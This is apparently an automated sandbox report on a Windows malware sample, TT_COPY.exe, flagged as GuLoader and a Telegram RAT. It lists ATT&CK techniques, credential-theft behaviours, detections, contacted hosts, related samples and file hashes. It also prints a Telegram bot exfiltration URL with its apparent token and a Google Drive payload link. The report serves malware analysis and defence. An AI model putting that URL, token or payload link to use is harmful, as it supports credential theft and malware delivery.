            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            11
            Input Capture
            127
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth1
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)111
            Process Injection
            1
            DLL Side-Loading
            1
            Credentials in Registry
            331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration21
            Encrypted Channel
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model11
            Input Capture
            Scheduled Transfer3
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script251
            Virtualization/Sandbox Evasion
            LSA Secrets251
            Virtualization/Sandbox Evasion
            SSH2
            Clipboard Data
            Data Transfer Size Limits114
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 645327 Sample: TT_COPY.exe Startdate: 14/06/2022 Architecture: WINDOWS Score: 100 22 googlehosted.l.googleusercontent.com 2->22 24 drive.google.com 2->24 26 2 other IPs or domains 2->26 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected GuLoader 2->36 38 Yara detected Telegram RAT 2->38 40 4 other signatures 2->40 8 TT_COPY.exe 2 20 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 42 Writes to foreign memory regions 8->42 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 28 api.telegram.org 149.154.167.220, 443, 49757 TELEGRAMRU United Kingdom 12->28 30 googlehosted.l.googleusercontent.com 142.251.39.97, 443, 49747 GOOGLEUS United States 12->30 32 drive.google.com 216.58.212.174, 443, 49746 GOOGLEUS United States 12->32 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 3 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            TT_COPY.exe34%VirustotalBrowse
            TT_COPY.exe22%ReversingLabsWin32.Trojan.Shelsy
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dll3%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            SourceDetectionScannerLabelLink
            dual-a-0001.dc-msedge.net0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t1%VirustotalBrowse
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://ocsp.sectigo.com00%Avira URL Cloudsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
            https://7A8mGBYFBx.net0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
            http://TUCKxL.com0%Avira URL Cloudsafe
            https://7A8mGBYFBx.nett-0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            dual-a-0001.dc-msedge.net
            13.107.22.200
            truefalseunknown
            drive.google.com
            216.58.212.174
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                googlehosted.l.googleusercontent.com
                142.251.39.97
                truefalse
                  high
                  doc-0s-as-docs.googleusercontent.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocumentfalse
                      high
                      https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3f7ipjgt74hjgn7nmh9mdv5ho/1655207400000/12280379857411278905/*/1JLP2zwq8GeTYGZF2eKMhocl6mu6XFy1T?e=downloadfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tTT_COPY.exefalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://sectigo.com/CPS0TT_COPY.exefalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.telegram.orgCasPol.exe, 00000007.00000002.5729704227.000000001D67C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.sectigo.com0TT_COPY.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot5467326717:AAF41uSu2l4RQYV3kk5EXHWUn6OGQmZ3_5M/sendDocumentdocument-----CasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://doc-0s-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f8cjpnf3CasPol.exe, 00000007.00000002.5705878323.0000000001134000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041705718.0000000001183000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5705683019.0000000001122000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://drive.google.com/CasPol.exe, 00000007.00000002.5703811420.00000000010B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#TT_COPY.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                https://7A8mGBYFBx.netCasPol.exe, 00000007.00000002.5729390937.000000001D64C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://drive.google.com/tCasPol.exe, 00000007.00000002.5703811420.00000000010B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://TUCKxL.comCasPol.exe, 00000007.00000002.5728331005.000000001D561000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorTT_COPY.exefalse
                                    high
                                    https://doc-0s-as-docs.googleusercontent.com/CasPol.exe, 00000007.00000003.1047854038.000000000113C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.5704775058.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://api.telegram.orgCasPol.exe, 00000007.00000002.5729812331.000000001D691000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000007.00000002.5729704227.000000001D67C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://7A8mGBYFBx.nett-CasPol.exe, 00000007.00000002.5729390937.000000001D64C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          149.154.167.220
                                          api.telegram.orgUnited Kingdom
                                          62041TELEGRAMRUfalse
                                          216.58.212.174
                                          drive.google.comUnited States
                                          15169GOOGLEUSfalse
                                          142.251.39.97
                                          googlehosted.l.googleusercontent.comUnited States
                                          15169GOOGLEUSfalse
                                          Joe Sandbox Version:35.0.0 Citrine
                                          Analysis ID:645327
                                          Start date and time: 14/06/202213:47:212022-06-14 13:47:21 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 13m 55s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:TT_COPY.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                          Run name:Suspected Instruction Hammering
                                          Number of analysed new started processes analysed:37
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@6/4@3/3
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 35.2% (good quality ratio 34.6%)
                                          • Quality average: 88.5%
                                          • Quality standard deviation: 20.8%
                                          HCA Information:
                                          • Successful, ratio: 98%
                                          • Number of executed functions: 122
                                          • Number of non-executed functions: 51
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, UsoClient.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 51.124.57.242, 40.117.96.136, 13.107.5.88
                                          • Excluded domains from analysis (whitelisted): www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, settings-win.data.microsoft.com, e-0009.e-msedge.net, arc.msn.com, wd-prod-cp.trafficmanager.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          TimeTypeDescription
                                          13:49:38API Interceptor1x Sleep call for process: TT_COPY.exe modified
                                          13:50:20API Interceptor2695x Sleep call for process: CasPol.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          149.154.167.220doc_B-9074.pdf.exeGet hashmaliciousBrowse
                                            3uAJWPxRDl.exeGet hashmaliciousBrowse
                                              ddIUN24ENo.exeGet hashmaliciousBrowse
                                                ORDER NO-08374345345.pdf.exeGet hashmaliciousBrowse
                                                  doc-file-pdf#00106877.exeGet hashmaliciousBrowse
                                                    9114044_Shanghai Global Precision Invoice20210822.exeGet hashmaliciousBrowse
                                                      3TQZDxo6Mv.exeGet hashmaliciousBrowse
                                                        6d4San0FG7.exeGet hashmaliciousBrowse
                                                          Kopija pla#U0107anja_(Zagreba#U010dka banka)_MAGEL.exeGet hashmaliciousBrowse
                                                            MTS_Trading Order.xlsxGet hashmaliciousBrowse
                                                              Document_PDF.exeGet hashmaliciousBrowse
                                                                email.htmlGet hashmaliciousBrowse
                                                                  Orignal BL docs AWB1067859873.xlsxGet hashmaliciousBrowse
                                                                    doc2022301001601.pdf.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.BehavesLike.Win32.ICLoader.fc.15526.exeGet hashmaliciousBrowse
                                                                        S.C 67677655.exeGet hashmaliciousBrowse
                                                                          1060513506_13062022.exeGet hashmaliciousBrowse
                                                                            schlechte Ware.exeGet hashmaliciousBrowse
                                                                              GIOocBl1DN.exeGet hashmaliciousBrowse
                                                                                lrPAFIe4Yo.exeGet hashmaliciousBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  api.telegram.orgdoc_B-9074.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  3uAJWPxRDl.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  ddIUN24ENo.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  ORDER NO-08374345345.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc-file-pdf#00106877.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  9114044_Shanghai Global Precision Invoice20210822.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  3TQZDxo6Mv.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  6d4San0FG7.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Kopija pla#U0107anja_(Zagreba#U010dka banka)_MAGEL.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  MTS_Trading Order.xlsxGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Document_PDF.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  email.htmlGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Orignal BL docs AWB1067859873.xlsxGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc2022301001601.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.BehavesLike.Win32.ICLoader.fc.15526.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  S.C 67677655.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  1060513506_13062022.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  schlechte Ware.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  GIOocBl1DN.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  lrPAFIe4Yo.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  dual-a-0001.dc-msedge.net2022-06-14_1000.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  2022-06-14_1000.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  EXJ23014738983875_202206141052.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  Qq_20220614_667676_001.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  20220614_024147_001.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  M9SrsdTmdk.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  customs broker_outstandings.jsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  lpNq7g3ui6.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  MmHE5C68Rw.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  41fk5pS4V1.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  6hiaBNzo79.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  799394160134530443147.xlsGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  LX4j6n9GYw.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  aNtxWfz93f.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.24108.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  1194 FE7191PO1.exeGet hashmaliciousBrowse
                                                                                  • 13.107.22.200
                                                                                  rsR48e0UV1.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  pago perdido correspondiente.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  Bestellung -20162022 _June 2022,pdf.exeGet hashmaliciousBrowse
                                                                                  • 131.253.33.200
                                                                                  AW Reminder Purchase Order PO20210223.vbsGet hashmaliciousBrowse
                                                                                  • 13.107.22.200
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  TELEGRAMRUdoc_B-9074.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  GxRKdvmKDW.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.99
                                                                                  P2EbNNhsVl.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.99
                                                                                  3uAJWPxRDl.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Hn4CD8w2BD.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.99
                                                                                  ddIUN24ENo.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  ORDER NO-08374345345.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc-file-pdf#00106877.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  9114044_Shanghai Global Precision Invoice20210822.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  3TQZDxo6Mv.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  6d4San0FG7.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Kopija pla#U0107anja_(Zagreba#U010dka banka)_MAGEL.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  MTS_Trading Order.xlsxGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Document_PDF.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  email.htmlGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Orignal BL docs AWB1067859873.xlsxGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc2022301001601.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.BehavesLike.Win32.ICLoader.fc.15526.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  S.C 67677655.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  1060513506_13062022.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eMxnnzorhy.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc_B-9074.pdf.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  https://cuatrolados.com/offaccessGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  v36h1tX00X.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.11146.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  3uAJWPxRDl.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  wul3KGY5K1.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  ddIUN24ENo.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Fax doc.htmlGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  https://t.co/BrXukLYVsFGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Boleta de Audiencia No_187410894189405.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Fsmhy.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Boleta de Audiencia No_187410894189405.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  doc-file-pdf#00106877.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  9114044_Shanghai Global Precision Invoice20210822.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  3TQZDxo6Mv.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  Request-20220613-267_docx.isoGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  6d4San0FG7.exeGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  https://drive.google.com/uc?export=download&id=1pQAZ-NGR4Osp4grvw05P5aZJXkntAL_SGet hashmaliciousBrowse
                                                                                  • 149.154.167.220
                                                                                  37f463bf4616ecd445d4a1937da06e192022-06-14_1000.xlsGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  2022-06-14_1000.xlsGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  EXJ23014738983875_202206141052.xlsGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  20220614_024147_001.xlsGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  https://cuatrolados.com/offaccessGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  sBSK2lT6pl.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  Order Zam#U00f3wienie C156977.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  https://shirikumarancollege.org/cieGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  16VULv6YT6.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  TNT.xlsmGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  #U260e#Ufe0fmessage 79903930.htmGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  http://jumv3a295q.frugalonline.in/74816029/aHR0cHM6Ly9mYWhyZXphb3MuY29tLy9mb250cy9taW5lLy9KVU1WM0EyOTVRL3NhbmFrYUBtYXNocmVxLmNvbQ==Get hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  SecuriteInfo.com.Gen.Variant.Nemesis.8198.16406.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  R3evSX7vPL.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  R3evSX7vPL.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  ORDER NO-08374345345.pdf.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  Popis narudzbe u prilogu.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  SecuriteInfo.com.Gen.Variant.Nemesis.8198.25853.exeGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  https://t.co/BrXukLYVsFGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  Nachricht 13062022.xlsGet hashmaliciousBrowse
                                                                                  • 216.58.212.174
                                                                                  • 142.251.39.97
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dllPRE-ALERT #U007e MV#MAERSK QINZHOU V.221W - ETD HKG 16 JUN 2022 - CNTR# GCXU5775776 MRSU5685742.exeGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Gen.Variant.Nemesis.8198.28791.exeGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.950064.31800.exeGet hashmaliciousBrowse
                                                                                        Rensnings9.exeGet hashmaliciousBrowse
                                                                                          TT_COPY.exeGet hashmaliciousBrowse
                                                                                            PRE-ALERT #U007e MV#MAERSK QINZHOU V.221W - ETD HKG 16 JUN 2022 - CNTR# GCXU5775776 MRSU5685742.exeGet hashmaliciousBrowse
                                                                                              New Order.exeGet hashmaliciousBrowse
                                                                                                Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousBrowse
                                                                                                  New Order.exeGet hashmaliciousBrowse
                                                                                                    Yeni sipari#U015f _No.129099, pdf.exeGet hashmaliciousBrowse
                                                                                                      ldzOp71fAH.exeGet hashmaliciousBrowse
                                                                                                        ldzOp71fAH.exeGet hashmaliciousBrowse
                                                                                                          Order Zam#U00f3wienie C156977.exeGet hashmaliciousBrowse
                                                                                                            Order Zam#U00f3wienie C156977.exeGet hashmaliciousBrowse
                                                                                                              BANK SLIP.pdf.exeGet hashmaliciousBrowse
                                                                                                                BANK SLIP.pdf.exeGet hashmaliciousBrowse
                                                                                                                  SecuriteInfo.com.Gen.Variant.Nemesis.8198.16406.exeGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Gen.Variant.Nemesis.8198.16406.exeGet hashmaliciousBrowse
                                                                                                                      SecuriteInfo.com.Gen.Variant.Nemesis.8198.25853.exeGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Gen.Variant.Nemesis.8198.25853.exeGet hashmaliciousBrowse
                                                                                                                          Process:C:\Users\user\Desktop\TT_COPY.exe
                                                                                                                          File Type:PC bitmap, Windows 3.x format, 312 x 267 x 32
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):333270
                                                                                                                          Entropy (8bit):7.6763188767102575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:7Auw2bPX8halzmhrN/7UL2fkKzP6aJlkOfapnLSqUuFuMB:7Az2LXGalz0V4L8kKzP6aJuOypLSqFEs
                                                                                                                          MD5:DE6EF37113653E681F51EF125A05A5B0
                                                                                                                          SHA1:F50F07A72445701815910AA05D3BEA76FD5F55FB
                                                                                                                          SHA-256:162C21EBF5857F544DAB94FA5B8943572B55A91A0A4616E19F7DACECE1563148
                                                                                                                          SHA-512:E7FD096C5BF9F0A67B030907F60C24DCB0CDA50C5C1B166902CFD905509514020C545AD088BFECB0A3F321037BAFD260FFA82A0992732B12723A80E663ADFF43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:BM........6...(...8......... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\TT_COPY.exe
                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):218
                                                                                                                          Entropy (8bit):6.548843212391007
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:6v/lhPysNBnmGKjdTJ8K49bFOk7K8ml2up:6v/7tBm5pJ8K8bFYl2c
                                                                                                                          MD5:FDD6EA8CAE0923DB4A381DB85A2D1DB8
                                                                                                                          SHA1:7906C57D827F884958F72BBD1C67A52D48566F13
